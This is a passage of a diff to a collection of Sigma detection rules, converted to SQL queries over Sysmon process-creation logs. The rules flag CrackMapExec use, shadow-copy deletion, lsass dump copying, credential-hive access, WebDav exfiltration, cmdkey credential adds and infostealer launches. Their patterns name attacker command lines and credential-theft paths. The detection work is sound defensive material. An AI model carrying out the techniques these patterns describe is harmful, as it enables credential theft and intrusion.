pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + }, + { + "title": "Suspicious Regsvr32 Execution With Image Extension", + "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "status": "experimental", - "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Another tool that uses the command line switches of PsLogList", - "Legitimate use of PsLogList by an administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psloglist.exe' OR (Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psloglist.yml" + "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", - "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Windows Admin Share Mount Via Net.EXE", - "id": "3abd6094-7027-475f-9630-8ab9be7b9725", - "status": "test", - "description": "Detects when an admin share is mounted using net.exe", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "title": "Suspicious Add Scheduled Task Parent", + "id": "9494479d-d994-40bf-a8b1-eea890237021", + "status": "experimental", + "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Administrators" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_net_use_mount_admin_share.yml" + "filename": "proc_creation_win_schtasks_parent.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.impact", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Some rare backup scenarios" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + }, + { + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "status": "test", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "title": "New Generic Credentials Added Via Cmdkey.EXE", + "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "description": "Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate usage for administration purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "PUA - NirCmd Execution", + "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_pua_nircmd.yml" }, { - "title": "Hiding Files with Attrib.exe", - "id": "4281cb20-2994-4580-aa63-c8b86d019934", - "status": "test", - "description": "Detects usage of attrib.exe to hide files from users.", - "author": "Sami Ruohonen", + "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", + "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", + "status": "experimental", + "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", + "author": "TropChaud", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1218.011" ], "falsepositives": [ - "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", - "Msiexec.exe hiding desktop.ini" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'RUNDLL32.EXE' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_attrib_hiding_files.yml" + "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet", - "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter 